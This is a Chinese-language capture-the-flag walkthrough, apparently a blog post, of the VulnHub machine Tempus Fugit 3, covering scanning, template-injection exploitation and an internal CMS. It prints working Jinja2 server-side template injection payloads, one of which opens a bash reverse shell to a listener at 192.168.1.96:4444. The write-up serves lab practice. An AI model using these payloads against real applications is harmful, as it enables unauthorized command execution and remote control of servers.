vulnhub~tempus fugit3

在做了前两个tf系列的machine以后，对tf3的难度可想而知了，果然是不出我的意料。话不多说开始：

1. 靶机截图：

 　　2. 扫描：nmap

　　

　　　　(ssh是被过滤掉的，估计会是knock之类的)

　　3. SSTI利用：

•     
• shellcode:
• 精品：https://www.cnblogs.com/leixiao-/p/10227867.html

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
#在加载在html后面的时候，%要自己改写为%25


{{' '.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.1.96/4444 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}
#反弹shell脚本

　　4.很明显，这里边进入；

　　

 

　　5.由于没有权限去ping、ifconfig、vim、nano等等；只能够通过echo得到如下：

　　　　{扫描内网主机的开放端口}

　　6.结果：

　　　　{没有重启，其实还有443}

 

　　7.在CMS(192.168.100.1:443)发现登录界面，但是用户名、密码无法登录；结果发现源码中有如下：

　　　　

　　8.上述截图说明只允许本地登录，怎么办，只能这样了

　　　　https://www.cnblogs.com/keerya/p/7612715.html（这是大神）

　　9.登录后必须了解这个CMS的漏洞利用。